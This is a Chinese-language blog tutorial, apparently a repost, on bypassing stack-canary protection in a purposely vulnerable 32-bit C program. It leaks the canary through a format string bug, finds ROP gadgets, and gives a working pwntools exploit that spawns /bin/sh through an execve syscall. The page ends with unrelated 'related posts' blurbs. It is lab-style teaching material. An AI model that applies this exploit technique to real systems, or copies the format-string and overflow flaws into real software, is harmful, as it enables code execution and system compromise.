构造带有堆栈保护的指令流

1. 引言

我们在学ropgadgets与ret2syscall技术原理时,构造指令流时,是没有加堆栈保护的,比如下面的程序:

文件名:7.c

  1. #include <stdio.h> 
  2. #include <string.h> 
  3. #include <sys/types.h> 
  4. #include <unistd.h> 
  5. #include <sys/syscall.h> 
  6. void exploit() 
  7.     system("/bin/sh"); 
  8. void func() 
  9.     char str[0x20]; 
  10.     read(0,str,0x50); 
  11.     printf(str); 
  12.     read(0,str,0x50); 
  13. int main() 
  14.     func(); 
  15.     return 0; 

我们是这样编译的,是没有加堆栈保护的,之后再利用ropgadgets构造指令流,就可以成功去执行execve(“/bin/sh”,null,null);。

  1. gcc -no-pie -fno-stack-protector -static -m32 -o 7.exe 7.c 

如果加上堆栈保护我们该怎么过呢?像下面这样编译:

  1. gcc -no-pie -fstack-protector -static -m32 -o 7.exe 7.c 

显然我们就不能像原来一样构造指令流了,因为加入了堆栈保护。那我们该怎么办呢?我们可以利用格式化输出,将canary打印出来,然后再进行指令的组装。

2. 找地址

调试我们的程序,找到canary的地址,地址在:0xffffcfac

继续调试,直到printf,我们看看现在canary据栈顶的位置:0060,除以4等于15,说明传给第一个read函数的值为:%15$08x,就可以将canary打印出来了

重新调试,找到read函数把读进来的数据存放的地址:0xffffcf8c

将%15$08x给read函数,发现可以将canary打印出来

接下来就是利用好第二个read函数来构造rop链了。

3.  构造rop链

linux上系统调用原理:

  • eax 系统调用号
  • ebx 第一个参数
  • ecx 第二个参数
  • edx 第三个参数
  • esi 第四个参数
  • edi 第五个参数
  • int 0×80

所以eax就存放execve函数的系统调用号11,ebx存放第一个参数/bin/sh,ecx存放第二个参数null,就是0,edx存放第三个参数,也是0

  1. ROPgadget --binary ./7.exe --only "pop|ret" | grep "eax" 

地址用:0x080b8546

  1. ROPgadget --binary ./7.exe --only "pop|ret" | grep "ebx" | grep "ecx" | grep "edx" 

地址为:0x0806f210

  1. ROPgadget --binary ./7.exe --string "/bin/sh" 

地址用:0x080bbd80

  1. ROPgadget --binary ./7.exe --only "int"|grep "0x80" 

地址为:0x0806ce37

4. 写出poc

  1. from pwn import * 
  2. context(arch="i386",os="linux"
  3. p=process('./7.exe') 
  4. p.sendline("%15$08x") 
  5. canary=p.recv()[:8] 
  6. print(canary) 
  7. canarycanary=canary.decode("hex")[::-1]    
  8. coffset=4*8                          
  9. roffset=3*4                  
  10. add_eax=p32(0x080b8546) 
  11. value_eax=p32(0xb) 
  12. add_edx_ecx_ebx=p32(0x0806f210) 
  13. value_ebx=p32(0x080bbd80) 
  14. value_ecx=p32(0) 
  15. value_edx=p32(0) 
  16. add_int=p32(0x0806ce37) 
  17. payload=coffset*'a'+canary+roffset*'a'+add_eax+value_eax+add_edx_ecx_ebx+value_edx+value_ecx+value_ebx+add_int 
  18. p.sendline(payload) 
  19. p.interactive() 

从from pwn import *到canary=canary.decode(“hex”)[::-1]都是为了找出canary,因为加了堆栈保护,我们不能直接把数据打入到堆栈中,所以要先找出canary,然后构造payload,我们要把canary加进去,过堆栈保护,再在后面加上我们的rop链。

执行成功

5. 总结

开启了堆栈保护,加入了cookie,一旦我们破坏了堆栈,会引起系统保护,出现异常。但是我们还是需要构造我们的指令流,我们可以利用格式化输出,将canary打印出来,接下来我们可以利用读写函数,构造一个指令流,我们先去读,看一下堆栈的canary在哪里,然后我们canary搞出来,把canary再回填进去,进行组装,这样就即可以过堆栈保护,也可以构造我们的指令流了。

 

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/146358.html<

(0)
运维的头像运维
上一篇2025-03-11 01:32
下一篇 2025-03-11 01:33

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注